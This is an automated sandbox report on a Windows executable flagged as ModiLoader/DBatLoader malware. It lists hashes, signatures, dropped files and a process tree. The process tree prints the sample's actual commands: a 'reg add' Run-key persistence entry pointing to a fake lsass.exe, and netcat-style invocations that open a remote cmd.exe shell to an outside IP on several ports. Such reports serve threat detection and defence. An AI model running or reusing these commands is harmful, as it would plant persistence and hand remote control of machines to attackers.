Overview

overview

10

Static

static

10

JaffaCakes...4c.exe

windows7-x64

10

JaffaCakes...4c.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    102s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-01-2025 21:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_8201a2015b83ef05748b40d32c286d4c.exe

  • Size

    307KB

  • MD5

    8201a2015b83ef05748b40d32c286d4c

  • SHA1

    53d767ec796eae7cc16bdf5361db78614e7ed302

  • SHA256

    6519feffa3f89642447b5664007b8a1a2b8c0cc108bd54cbf406774fdcf14228

  • SHA512

    07b2454c5c2ec2dfa42866a27892bcba95fd3fd6f1f17000614cdb0628edf31eea6604ae94b9d4aa6fcc039989677fa127d2ddebb35a4e317efce197556b27b5

  • SSDEEP

    6144:FKhwQpSlNb++r2pyWaBZ79lh5pjVyGSEwsSkc6Yc5Q8qF9l4:F3USrb+uzWan79lhrhwsXYcOvu

Score
10/10
modiloaderdiscoverypersistencetrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Modiloader family
    modiloader
  • ModiLoader Second Stage 6 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_8201a2015b83ef05748b40d32c286d4c.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_8201a2015b83ef05748b40d32c286d4c.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4900
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\system32\temp\bat.bat" "
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2060
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Desktop.ini /t REG_SZ /d "c:\windows\lsass.exe" /f
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:2544
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\system32\temp\bat.bat" "
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:232
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Desktop.ini /t REG_SZ /d "c:\windows\lsass.exe" /f
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:5044
      • \??\c:\windows\killer.exe
        c:\windows\killer.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1544
        • \??\c:\windows\killer.exe
          c:\windows\killer.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4428
          • C:\Windows\Temp\cch.exe
            "C:\Windows\Temp\cch.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3180
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\system32\temp\bat.bat" "
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3512
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Desktop.ini /t REG_SZ /d "c:\windows\lsass.exe" /f
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:3172
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\system32\temp\bat.bat" "
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2340
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Desktop.ini /t REG_SZ /d "c:\windows\lsass.exe" /f
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:4700
      • C:\Windows\SysWOW64\temp\lsass.exe
        C:\Windows\system32\temp\lsass.exe 195.208.242.15 80 -e cmd.exe -d
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2708
      • C:\Windows\SysWOW64\temp\lsass.exe
        C:\Windows\system32\temp\lsass.exe 195.208.242.15 82 -e cmd.exe -d
        3⤵
          PID:1704
        • C:\Windows\SysWOW64\temp\lsass.exe
          C:\Windows\system32\temp\lsass.exe 195.208.242.15 11457 -e cmd.exe -d
          3⤵
            PID:4832

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\SysWOW64\FJUSWNP.tmp
        Filesize

        13B

        MD5

        38de427224a5082a04fe82e2bd4ea9ec

        SHA1

        7e4a53de1f83762dd2febd39b818e2258bc83bc1

        SHA256

        12f99f53144294750fe8713d580eda286f4bd95cd9c840db8ab957def8040028

        SHA512

        ec3f3c324eeaad91ab0efd47b3084493d863f969344fa1ba87ace1974908053d396673b44c33b4dceeef792a74ad9278e06acc27c83459af1153de52f83afcbf

        Download Submit

      • C:\Windows\SysWOW64\temp\bat.bat
        Filesize

        417B

        MD5

        2217c02f61638e9544ff1a721d764db4

        SHA1

        490c084e4b9536f7f7a3ac70aa74da2232ecf079

        SHA256

        8b359dd2d30aa15d596fd0e90b8137c98318fd57e16ac1b70252014b3a5d4c7a

        SHA512

        5749cbf7e6351d5bffeafa63f40d889cf5498d8d1b2fe537be4f932f8900dfa4abeed7a846c60a3461efebe3239cc64fe939287500521b44e978b06aab11e01e

        Download Submit

      • C:\Windows\SysWOW64\temp\bat.bat
        Filesize

        204B

        MD5

        9980ad3fdd11067226543eda13f3cb6d

        SHA1

        5fdebd89955ae92b030e8ef112a252dfdfee1041

        SHA256

        57ac0f25f367bbb305a15ae7dc74c13367a0368a848ed9b6b27961fcb2945c3c

        SHA512

        fc3d01f9f5d979fe029279ba0ae1aa87e7cb26bcd3104644bb59934624304f3e0be41f865025ec7c7d2bac68aedfe9402a7c2733253e052edd3ef707397939f8

        Download Submit

      • C:\Windows\SysWOW64\temp\bat.bat
        Filesize

        239B

        MD5

        8858fa714028696e748bda58c5c8aa77

        SHA1

        74e74de493930d0ae721cb2c11ded15798e198cc

        SHA256

        6db4c647ed929935ac75d6e4b4ee12efb8bbbdac27e301697de8297d36dab870

        SHA512

        c51f65eadf6dc01f1825a844c60e94ac23d441d445221718789668d56bb9f0446e16efbcd65e9a3445f87bab577cf0dcbbd8a5be7f66bf35f0b8fc9c9c245219

        Download Submit

      • C:\Windows\SysWOW64\temp\bat.bat
        Filesize

        210B

        MD5

        22938b34240097fbd16ad7a6c959c289

        SHA1

        1670a74edf1512f9d0fbf83db06cd909168efbf8

        SHA256

        27afd93407ca77dff219c7fa50ec3ec2d9cd1d4ef51a7b5a218a5bfa5cb3e658

        SHA512

        888c1f4f990090da8151fff8fe5ab8809dfbca968e916dec419ac7b9b13442ffbb087eff373fe563b8cf2d529d6f22d69c196bd56b8d54e04f5a01f5ef721f83

        Download Submit

      • C:\Windows\SysWOW64\temp\lsass.exe
        Filesize

        48KB

        MD5

        607e0910b5bc71e05db3cc9750bb5f19

        SHA1

        cace0b966041d52001351293f2e041c1ef24acf1

        SHA256

        5051d55ba989612a076dc31d20f47a967280d85888d43d34a73e6f49a03eb277

        SHA512

        867e8815bc706bd3504b81630bda7fea115e6e764dccdbaf13c6fb240f09827168a4a1142251c379b6bf463ae950614a48f366a71e48b21c7019e5f4ab6f2b7d

        Download Submit

      • C:\Windows\Temp\cch.exe
        Filesize

        13KB

        MD5

        cc860f8941a621c56d230e891946a84f

        SHA1

        56e585193f4cc941c3aff29b36ac2bd9393bbe08

        SHA256

        22a533b8b67a4494e215a431738661975e580af701a1788448f1859f17445c25

        SHA512

        88968e23917a611397ab5c8cfd6f07e836f6b206552bf469a6bebf426abd413706bdbfa2e4355f4275f6172ef9b1ca4e452353cf249c4a5c56336e8992cb5871

        Download Submit

      • C:\Windows\killer.exe
        Filesize

        172KB

        MD5

        85d8a0553b43d827c46a8e1d88b61ba8

        SHA1

        bd4fc991509f5d7e48b1f69b8f89a402608e1167

        SHA256

        56dc00cbd54ece203eea0dd645627c92813358fabf7795fda54f2be78cbb5a1f

        SHA512

        be52a474b241e7fab92b292698df5afdbac99ce7630fee892f46f06f83368d00e830339dbf895ce4fa4af9e09f97d78aa81a7205d2aae1882a82fc3972c2c090

        Download Submit

      • memory/1544-23-0x0000000010000000-0x0000000010031000-memory.dmp

        Filesize

        196KB

        Download

      • memory/1704-70-0x0000000000400000-0x0000000000422000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1704-66-0x0000000000400000-0x0000000000422000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2708-56-0x0000000000400000-0x0000000000422000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2708-63-0x0000000000400000-0x0000000000422000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2708-59-0x0000000000400000-0x0000000000422000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3180-35-0x0000000000400000-0x000000000040B000-memory.dmp

        Filesize

        44KB

        Download

      • memory/4428-20-0x0000000000400000-0x0000000000476000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4428-26-0x0000000002210000-0x0000000002211000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4428-22-0x0000000000400000-0x0000000000476000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4428-24-0x0000000000400000-0x0000000000476000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4428-36-0x0000000000400000-0x0000000000476000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4428-25-0x0000000000400000-0x0000000000476000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4832-73-0x0000000000400000-0x0000000000422000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4900-46-0x0000000000400000-0x0000000000453000-memory.dmp

        Filesize

        332KB

        Download

      • memory/4900-8-0x0000000000400000-0x0000000000453000-memory.dmp

        Filesize

        332KB

        Download

      • memory/4900-58-0x0000000000400000-0x0000000000453000-memory.dmp

        Filesize

        332KB

        Download

      • memory/4900-37-0x0000000000400000-0x0000000000453000-memory.dmp

        Filesize

        332KB

        Download